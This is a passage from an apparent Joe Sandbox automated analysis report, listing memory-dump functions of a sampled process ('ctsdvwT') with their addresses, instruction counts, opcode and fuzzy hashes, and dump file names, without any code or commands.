                                            • Snapshot File: hcaresult_11_2_15cd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f32df2b1c19e123ec43a3cfdc13968143bf5c73bd801405e3040c45be24b4487
                                            • Instruction ID: 1bc656ca6061d1b2b6b2c0558686f733f6f61c69d09c85d2e87aaae24c41875b
                                            • Opcode Fuzzy Hash: f32df2b1c19e123ec43a3cfdc13968143bf5c73bd801405e3040c45be24b4487
                                            • Instruction Fuzzy Hash: 3E21F1755042049FCB15DFA8D580B26BBA5FB84714F20C97DD90A9F256D33AD406CAA1
                                            Function 01811888 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b87fbcbacac5ac0708d182508bd47d771d55c4207ebcc5a9b42e0d7f8bcc855d
                                            • Instruction ID: 56059bb4cffa258bf5afd0409c2325176664e6938613204a5a433abc65020775
                                            • Opcode Fuzzy Hash: b87fbcbacac5ac0708d182508bd47d771d55c4207ebcc5a9b42e0d7f8bcc855d
                                            • Instruction Fuzzy Hash: 68213C31B00209CFDB64DB78C5586AD77FAEB49344F5004A9D606EB368DF369E41CBA2
                                            Function 01811898 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f737b9317de402be3ce3b71c9a556dc470fe886d14fa1e0afdfacc354e7c1a6a
                                            • Instruction ID: 7a03212cf77f16f148ddd7aeee81540cb3892f2e1f1428a3470d64dcc9a16ab4
                                            • Opcode Fuzzy Hash: f737b9317de402be3ce3b71c9a556dc470fe886d14fa1e0afdfacc354e7c1a6a
                                            • Instruction Fuzzy Hash: 83214135B00209CFDB54DB78C5586AD77FAAF49344F500468D606EB358DF359E41CBA2
                                            Function 01818C58 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 32753dc46239c82de4568e2bbc85c6d4b1300ae5b300c029d050bd12ad84af15
                                            • Instruction ID: 451c48db56fa198ad7a50617d81b8f268afa44cce9639938003601c966a2e057
                                            • Opcode Fuzzy Hash: 32753dc46239c82de4568e2bbc85c6d4b1300ae5b300c029d050bd12ad84af15
                                            • Instruction Fuzzy Hash: EF216231E0060A9BDB19CFA8C4555DEB7B6EF8A310F20C51AEC15FB354DB709945CB91
                                            Function 018116C0 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b5d7b0634528dd243e45f0e2c060ff366ab06f5ae1e975736120cd4af5f46531
                                            • Instruction ID: a56fd73b2a1e7372aa0cdb8952e92f64976305a740531eb2719f524143f6edc2
                                            • Opcode Fuzzy Hash: b5d7b0634528dd243e45f0e2c060ff366ab06f5ae1e975736120cd4af5f46531
                                            • Instruction Fuzzy Hash: EA216F356100054FEB669B39F888B6A3B6DEB49304F104E21D51ACB35EDF28DD858B92
                                            Function 01814FA8 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a2b5c6d7eb5bf6a2ce06d8ebc13e10de602424e9f654c1df19b6618a13a495c
                                            • Instruction ID: 1787c8d186cba381c46178f68bc69328f5509d94a755660ad0473fe50834e67e
                                            • Opcode Fuzzy Hash: 9a2b5c6d7eb5bf6a2ce06d8ebc13e10de602424e9f654c1df19b6618a13a495c
                                            • Instruction Fuzzy Hash: F7211635B00209DFDB14DB78D558AAD7BF5EB89714F1044A8E406EB3A8DB369E00CBA1
                                            Function 018117D0 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1cb72c07ccc5101737ac5878085b89bde6f54807b05ba0c6cde357d025f2e0c4
                                            • Instruction ID: 38b85458bd1cee15e029368b520b3ba3a04705a7a185b2a94cd1d6b53985d3c4
                                            • Opcode Fuzzy Hash: 1cb72c07ccc5101737ac5878085b89bde6f54807b05ba0c6cde357d025f2e0c4
                                            • Instruction Fuzzy Hash: 6011E372F00216ABCB20AB799C4976E7FB9EB48654F144465EA09D3345EE34CE02C792
                                            Function 015CD006 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4506811045.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_15cd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: add7eb744995bdf7246a2ca5072ebddb1ce3c5bf89f09ee481d630813477eb65
                                            • Instruction ID: aee58b0cc280f041c1798507a9ff1a5ed378248b093c5df3640f81c39b93c4bb
                                            • Opcode Fuzzy Hash: add7eb744995bdf7246a2ca5072ebddb1ce3c5bf89f09ee481d630813477eb65
                                            • Instruction Fuzzy Hash: 7D217F755093808FDB13CF68D594715BF71FB46214F28C5EAD8498F6A7C33A980ACBA2
                                            Function 01810848 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bfe3c116a48617c5d2cb89d7cfd88f38d66fc8eaaef10de2859746006330dbb3
                                            • Instruction ID: 95bd4716bb642eb873c95f675782327cfee4dd4822e9501bfb519f4870a445f9
                                            • Opcode Fuzzy Hash: bfe3c116a48617c5d2cb89d7cfd88f38d66fc8eaaef10de2859746006330dbb3
                                            • Instruction Fuzzy Hash: D2119D32B082088BEF655B7DDC4472E3699EB49314F204879F816CB29ADA24CEC58BC1
                                            Function 01811498 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 01524ac9f50097d8b5563c315b80685cdd390abeeacc3584b0f7f2b30b93cea1
                                            • Instruction ID: 9b61919277a7e35be3fb5e5c34af2e4b32ff9f9622c45e512a22a521fb17f6f9
                                            • Opcode Fuzzy Hash: 01524ac9f50097d8b5563c315b80685cdd390abeeacc3584b0f7f2b30b93cea1
                                            • Instruction Fuzzy Hash: CA115172A003158FCB61EFBC84451ED7BE9AB59310B24447AE90AE7245E635CA428BA2
                                            Function 018114A8 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d69e20b3a11b33cc29c7039d3bb8143cc72042d078419c2736cda1e2a57e26d3
                                            • Instruction ID: 0912682d2b74a6151f9e1f60273e4f8d20f0bb47591d6aaa1bd1dfaa2a484318
                                            • Opcode Fuzzy Hash: d69e20b3a11b33cc29c7039d3bb8143cc72042d078419c2736cda1e2a57e26d3
                                            • Instruction Fuzzy Hash: CF012132A002158FCB65EFBC88551AD7BE9EF59310F140479E90AE7245E635DA828BA2
                                            Function 01811534 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93b38cf9ffc6771e8360c66ce212953f698584bdbee5647500cdf0569239f8ff
                                            • Instruction ID: bcc38b6b0740ff56909fece4e6569b940a2612710d81bbeca896b689a4494ef4
                                            • Opcode Fuzzy Hash: 93b38cf9ffc6771e8360c66ce212953f698584bdbee5647500cdf0569239f8ff
                                            • Instruction Fuzzy Hash: 32F0F673A04150CBD7228BBC98951ECBF79EE64311B1C00D7E606DB25AD225D642C751
                                            Function 01817BEB Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3e060417fa554032a30f5356b405dd28f8e6b7dd551d25862dcfb21a6a1d851e
                                            • Instruction ID: e97537c4beee4667a1bd1cd5b5a0339b59843152cf371fc786b52751a6d337f3
                                            • Opcode Fuzzy Hash: 3e060417fa554032a30f5356b405dd28f8e6b7dd551d25862dcfb21a6a1d851e
                                            • Instruction Fuzzy Hash: A701263094010A9FDB06DBB4FD84A8E3B75EF44308F0082B8C4249B2A5DE356E0AC791
                                            Function 01817BF8 Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 174b9db3d1bac1f39be6bf6ae69515d14b043cac5265d7c80d9b14d6c2dd5093
                                            • Instruction ID: 408b7ff9e58ac6796522f2d5ec13eb8cfbbdfaa11684d01ded02ba6248a0df83
                                            • Opcode Fuzzy Hash: 174b9db3d1bac1f39be6bf6ae69515d14b043cac5265d7c80d9b14d6c2dd5093
                                            • Instruction Fuzzy Hash: 61F06D3094010DEFDB45EFB5F98498E7BB9EF44204F508278C4189B264EE35AE498B91